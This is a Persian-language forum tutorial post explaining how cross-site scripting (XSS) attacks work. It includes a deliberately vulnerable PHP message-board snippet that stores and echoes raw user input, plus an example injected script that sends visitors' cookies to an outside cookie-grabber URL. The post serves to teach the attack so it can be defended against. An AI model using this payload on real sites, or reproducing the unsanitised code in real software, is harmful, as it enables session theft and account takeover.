زمان جاری : پنجشنبه 13 اردیبهشت 1403 - 1:23 قبل از ظهر
نام کاربری : پسورد : یا عضویت | رمز عبور را فراموش کردم

صفحه اصلی / اموزش ها و پلاگین ها امنیتی رایگان جهت مقابله با هک چت روم / حملات XSS یا Cross Site Scripting


تعداد بازدید 1614
نویسنده پیام
admin آفلاین
admin

ارسال‌ ها23
عضویت12 /11 /1392
تشکرها1
حملات XSS یا Cross Site Scripting
در این پست شما را با نحوه رخ دادن حملات xss آشنا می کنم./

این حملات زمانی رخ می دهد که یک سایت کد مخرب از کاربر دریافت کند و این کد از طریق این سایت در کامپیوتر قربانی مورد پردازش قرار گیرد. در واقع نفوذگر کد مخرب خود را که بر پایه دستورات html,JavaScript,Css هست را به سایت آسیب پذیر وارد کرده و سایت بدون هیچ فیلتر و یا پردازش ورودی این کد را بر روی کامپیوتر قربانی اجرا می کند./ این روش بیشتر برروی نفوذ از طریق کاربران تمرکز دارد./

این حمله از اعتماد یک کاربر به سایت سوء استفاده می شود و بر اساس همین اعتماد کدهای تزریق شده برروی کامپیوتر قربانی اجرا شده و این کدها می توانند هویت این کاربر را نزد نفوذگر افشا کنند./

حملات xss به صورت مختلفی پایه گذاری می شوند:
- فرستان یک لینک به کاربران مجاز: در این روش نفوذگر یک لینک را به کاربر ارسال می نماید و کاربر را ترغیب به رفتن به این لینک می نماید که متاسفانه پس از کلیک کد برروی سیستم قربانی اجرا می شود./

- اجرای کد توسط سایت مورد اعتماد کاربر که از آن بازدید می نماید: ممکن است شما نیز به دام این حمله افتاده باشید و پس از مشاهده یک پیغام و یا پست در سایت مورد علاقه خود مورد حمله قرار گرفته باشید. معمولا در تالارهایی که امکان استفاده از کدهای جاوا و html وجود دارد این نوع حمله قابل مشاهده است.

- کدهای مخرب ارسال شده توسط یک کاربر برای دیگر کاربران: در طول روز با سایت های زیادی بر خورد می کنید که ممکن است در هرکدام از این سایت ها امکان ارسال نظرات و پیام برای شما میسر باشد. حال اگر این پیام بدون هیچ کنترل و فیلتر مورد پردازش قرار گیرد نتیجه چیست؟؟؟ بله قطعا فاجعه برای کاربرانی که به این سایت اعتماد کرده اند و ممکن است تمامی اطلاعاتشان در خطر قرار گیرد.

کد زیر را در نظر بگیرید:کد PHP:
کد:

کد:

<?php
if (isset($_POST['message'])){
file_put_contents('board.txt',"{$_POST['message']}<hr/>",FILE_APPEND);
}
$messages=file_get_contents('board.txt');
echo $messages;
?>


در این مثال متن گرفته شده از کاربر بدون هیچ پردازشی در فایل board.txt قرار گرفت تا برای کاربران نمایش داده شود.
حال اگر نفوذگر کد زیر را وارد نماید:کد HTML:document.location=\'http://silentDi3.co.cc/cookieGraber.php?cookies=\' document.cookieنتیجه آن می شود که هرکاربری مجاز سایت از این نظر و این قسمت مشاهده نماید کوکی مورد استفاده این کاربر برای نفوذگر ارسال می شود./

در پست های بعد نحوه امن سازی این باگ امنیتی را مرور می کنیم./
یکشنبه 01 تیر 1393 - 16:22
ارسال پیام نقل قول تشکر گزارش







برای ارسال پاسخ ابتدا باید لوگین یا ثبت نام کنید.


پرش به انجمن :